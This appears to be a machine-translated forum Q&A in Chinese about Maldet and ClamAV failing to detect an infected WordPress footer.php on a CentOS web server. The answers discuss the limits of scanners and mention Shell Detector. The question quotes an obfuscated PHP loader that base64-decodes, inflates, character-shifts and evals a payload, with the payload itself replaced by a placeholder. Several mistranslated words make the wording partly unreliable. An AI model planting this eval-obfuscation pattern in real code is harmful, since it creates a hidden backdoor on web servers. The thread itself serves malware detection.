我已经在CentOS 7服务器上安装了Linux恶意软件检测和ClamAV,看起来没问题,因为它碰到了EICAR恶意软件testing文件 ,并且没有问题的定期扫描。
当我上传一个真实的恶意软件PHP文件时,问题就出现了,这个文件是我之前在一个旧的共享networking服务器上进行的攻击。 Maldet并不认为这是一个恶意文件。
我知道所有的AV可以错过一些威胁,但在这种情况下是一个非常明显的感染文件,国际海事组织。
//footer.php <?php function nBMj($NrG) { $NrG=gzinflate(base64_decode($NrG)); for($i=0;$i<strlen($NrG);$i++) { $NrG[$i] = chr(ord($NrG[$i])-1); } return $NrG; } eval(nBMj("Some_base64_encoded_text")); ?> 这是一个非常常见的WordPress的黑客,甚至没有可疑的function混淆。
来自Maldet开发者页面 :
特征
- 用于检测混淆威胁的统计分析组件(例如:base64)
- 清理规则删除base64和gzinflate(base64注入恶意软件
这是一个拥有10到20个网站的Web服务器,运行stream行的CMS,比如drupal和wordpress,所以绝大多数的攻击都会带有这种文件感染。
所以,这个问题:我错过了什么? 是否有任何特殊的configurationbase64 / gzinflate脚本或这是一个正常的行为? 也许Maldet w / ClamAv不是networking服务器的最佳工具?
我错过了什么?
基本上是的。 像maldet和clamav这样的工具不能为您提供100%的检测率和恶意软件保护。 即使是企业级的防病毒解决scheme也可能失败 – 但是从我的经验来看(其中一些)比这两个更好。
maldet和clamav在这里是为了让你摆脱一大堆恶意软件 – 相信我,这是他们中的很多人。 你的问题的第二部分是关于一些非常着名的恶意软件的丢失。 不幸的是,它发生了。 这是讨论的主题。
对我来说,这两个未能检测到b374k壳是令人震惊的。 但是再次certificate,即使检测率达到99.9%,也不能依靠反恶意软件扫描仪的质量来制定安全策略。
在这个答案中只需要增加2¢:带有问题提供的PHP代码的文件肯定会被Shell Detector标记为可疑。 但是,准备好可能有很多误报。 您必须进行眼球检查并将其列入白名单。